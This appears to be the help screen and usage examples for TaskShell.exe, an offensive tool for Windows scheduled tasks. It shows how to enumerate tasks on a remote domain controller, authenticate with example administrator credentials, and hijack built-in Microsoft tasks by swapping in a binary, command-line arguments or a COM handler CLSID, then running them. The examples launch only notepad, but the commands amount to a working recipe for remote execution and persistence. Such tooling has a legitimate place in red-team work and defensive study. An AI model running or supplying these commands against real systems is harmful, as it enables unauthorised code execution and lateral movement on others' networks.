-h, --Host Required. The remote host
-u, --Username The remote host
-p, --Password The password
-d, --Domain The remote domain
-t, --Task Fetch info of a specific task
-b, --Binary The binary to tamper the scheduled task with
-a, --arguments Additional command line arguments for the task
-r, --Run Run the task after modifying it
-s, --Search Search for a specific task
-c, --Clsid The CLSID to use as a COM handler
--help Display this help screen.
--version Display version information.
# Enumerate tasks on a remote host using current user
TaskShell.exe -h DC01
# Authenticate using explicit credentials
TaskShell.exe -h DC01 -u Administraor -p Password1 -d domain.com
# Search for a task name (case sensitive)
TaskShell.exe -h DC01 -s "OneDrive"
# or a user
TaskShell.exe -h DC01 -s "SYSTEM"
TaskShell.exe -h DC01 -s "Users"
# Get info about a specific task
TaskShell.exe -h -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Disk
# Tamper the task with a binary action
TaskShell.exe -h -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Disk
Diagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" -b notepad.exe -r
# using arguments is supported as well
TaskShell.exe -h -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Mobi
le Broadband Accounts\MNO Metadata Parser" -b cmd.exe -a "/C notepad.exe" -r
# Tamper the task with a COM handler
TaskShell.exe -h -u administrator -p 1qazxsw2.. -d isengard.local -t "\Microsoft\Windows\Disk
Diagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" -c "75DFF2B7-6936-4C06-A8BB-676A7B00B24B" -r